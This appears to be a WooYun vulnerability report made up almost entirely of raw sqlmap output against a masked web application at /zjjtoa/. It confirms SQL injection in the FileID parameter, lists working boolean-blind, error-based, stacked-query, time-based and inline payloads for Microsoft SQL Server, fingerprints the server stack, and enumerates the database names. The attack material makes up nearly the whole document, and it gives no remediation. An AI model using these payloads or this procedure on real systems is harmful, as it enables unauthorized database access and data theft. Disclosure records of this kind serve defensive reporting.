WooYun.org

http://**.**.**.**/zjjtoa/

GET parameter 'FileID' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N]
sqlmap identified the following injection points with a total of 51 HTTP(s) requ
ests:
---
Parameter: FileID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FileID=4606 AND 1307=1307
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: FileID=4606 AND 8424=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(1
22)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8424=8424) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: FileID=4606; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: FileID=4606 WAITFOR DELAY '0:0:5'--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: FileID=(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(S
ELECT (CASE WHEN (8121=8121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(11
2)+CHAR(120)+CHAR(120)+CHAR(113))
---
[22:56:58] [INFO] testing Microsoft SQL Server
[22:56:58] [INFO] confirming Microsoft SQL Server
[22:56:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[22:56:59] [INFO] fetching database names
[22:56:59] [INFO] the SQL query used returns 5 entries
[22:56:59] [INFO] retrieved: master
[22:56:59] [INFO] retrieved: model
[22:56:59] [INFO] retrieved: msdb
[22:56:59] [INFO] retrieved: tempdb
[22:56:59] [INFO] retrieved: zjjtoa
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zjjtoa